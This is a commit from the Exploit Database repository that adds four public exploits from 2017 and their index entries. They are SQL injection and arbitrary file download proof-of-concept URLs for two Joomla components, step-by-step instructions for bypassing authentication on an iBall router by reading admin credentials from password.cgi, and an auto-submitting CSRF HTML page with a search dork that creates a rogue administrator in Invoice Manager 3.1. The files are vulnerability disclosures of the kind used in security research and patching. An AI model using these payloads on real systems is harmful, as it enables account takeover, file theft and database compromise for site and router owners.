DB: 2017-08-31

4 new exploits

Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
iBall Baton 150M Wireless Router - Authentication Bypass
Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)
This commit is contained in:
Offensive Security 2017-08-31 05:01:22 +00:00
parent 13819fd065
commit 6b9cb90c81
5 changed files with 202 additions and 0 deletions

View file

@ -38373,3 +38373,7 @@ id,file,description,date,author,platform,type,port
42584,platforms/php/webapps/42584.txt,"User Login and Management - Multiple Vulnerabilities",2017-08-29,"Ali BawazeEer",php,webapps,0
42585,platforms/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",php,webapps,0
42588,platforms/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",hardware,webapps,0
42589,platforms/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",php,webapps,0
42590,platforms/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - Arbitrary File Download",2017-08-30,"Ihsan Sencan",php,webapps,0
42591,platforms/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,php,webapps,0
42592,platforms/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",php,webapps,0

Can't render this file because it is too large.

26
platforms/php/webapps/42589.txt Executable file
View file

@ -0,0 +1,26 @@
# # # # #
# Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
# Dork: N/A
# Date: 30.08.2017
# Vendor Homepage: http://joomplace.com/
# Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
# Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
# Version: 3.7.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
# http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
#
# Etc..
# # # # #

25
platforms/php/webapps/42590.txt Executable file
View file

@ -0,0 +1,25 @@
# # # # #
# Exploit Title: Joomla! Component Joomanager 2.0.0 - Arbitrary File Download
# Dork: N/A
# Date: 30.08.2017
# Vendor Homepage: http://www.joomanager.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/joomanager/
# Demo: http://www.joomanager.com/demo/realestate
# Version: 2.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The security obligation allows an attacker to arbitrary download files..
#
# Proof of Concept:
#
# http://localhost/[PATH]/index.php?option=com_joomanager&controller=details&task=download&path=[FILE]
#
# Etc..
# # # # #

74
platforms/php/webapps/42591.txt Executable file
View file

@ -0,0 +1,74 @@
Title:
====
iball Baton 150M Wireless router - Authentication Bypass
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
07-03-2017
Vendor:
======
iball Envisioning the tremendous potential for innovative products required
by the ever evolving users in computing and digital world, iBall was
launched in September 2001 and which is one of the leading networking
company
Product:
=======
iball Baton 150M Wireless-N ADSI.2+ Router
Product link:
http://www.iball.co.in/Product/150M-Wireless-N-Broadband-Router/539
Abstract:
=======
iball Baton 150M Router's login page is insecurely developed that any
attacker could bypass the admin's authentication just by tweaking the
password.cgi file.
Affected Version:
=============
Firmware Version : 1.2.6 build 110401 Rel.47776n
Hardware Version : iB-WRA150N v1 00000001
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
9
Details:
=======
Any attacker can escalate his privilege to admin using this vulnerability.
Proof Of Concept:
================
1) Navigate to Routers Login page which is usually IPV4 default Gateway IP,
i.e 172.20.174.1
2) Now just append password.cgi to the URL i.e
http://172.20.174.1/password.cgi
3) Right-click and View Source code which disclsus the username, password
and user role of the admin in the comment section
4) Successfully logged in using the disclosed credentials.
Reference:
=========
Video POC :
https://drive.google.com/file/d/0B6715xUqH18MS1J5Sk13emFkQmc/view?usp=sharing
Disclosure Timeline:
======================================
Vendor Notification: March 5, 2017
-----
Indrajith.A.N

View file

@ -0,0 +1,73 @@
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<!--
# Exploit Title: Invoice Manager v3.1 - Cross site request forgery (Add Admin)
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: inurl:controller=pjAdmin
# Date: 30.08.2017
# Homepage: https://www.phpjabbers.com/invoice-manager/
# Software Demo Link: http://demo.phpjabbers.com/1504048815_513/index.php?controller=pjAdmin&action=pjActionLogin
# Version: 3.1
# Category: Webapps /php
# Tested on: mozila firefox
#
#
-->
# ========================================================
#
#
# Invoice Manager v3.1 Cross site request forgery (Add Admin)
#
# Description : Invoice Manager v3.1 is vulnerable to CSRF attack (No CSRF token in place) which if an admin user can be
# tricked to visit a crafted URL created by attacker (via spear phishing/social engineering).
# Once exploited, the attacker can login as the admin using the email and the password in the below exploit.
#
#
# ======================CSRF POC (Adding New user with Administrator Privileges)==================================
<html>
<body>
<form name="csrf_form" action="http://localhost/invoice/index.php?controller=pjAdminUsers&action=pjActionCreate" method="post">
<input name="user_create" id="user_create" value="1" type="hidden">
<input name="role_id" id="role_id" value="1" type="hidden" >
<input name="email" id="email" value="AliBawazeEer@localhost.com" type="hidden">
<input name="password" id="password" value="12341234" type="hidden">
<input name="name" id="name" value="Ali BawazeEer" type="hidden">
<input name="phone" id="phone" value="911911911" type="hidden">
<input name="status" id="status" value="T" type="hidden">
<script type="text/javascript">document.csrf_form.submit();</script>
</body>
</html>
# =================================================EOF =======================================================
#
#
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
#
#
# Remedy : developer should implement CSRF token for each request
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #